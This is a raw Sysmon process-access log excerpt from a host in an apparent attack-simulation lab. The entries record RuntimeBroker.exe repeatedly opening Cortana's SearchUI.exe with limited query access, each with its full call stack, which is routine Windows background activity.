12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007665Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007664Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007663Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007662Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007661Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007660Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007659Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007658Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007657Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007656Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007655Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007654Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007653Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007652Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007651Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007650Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007649Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007648Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007647Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 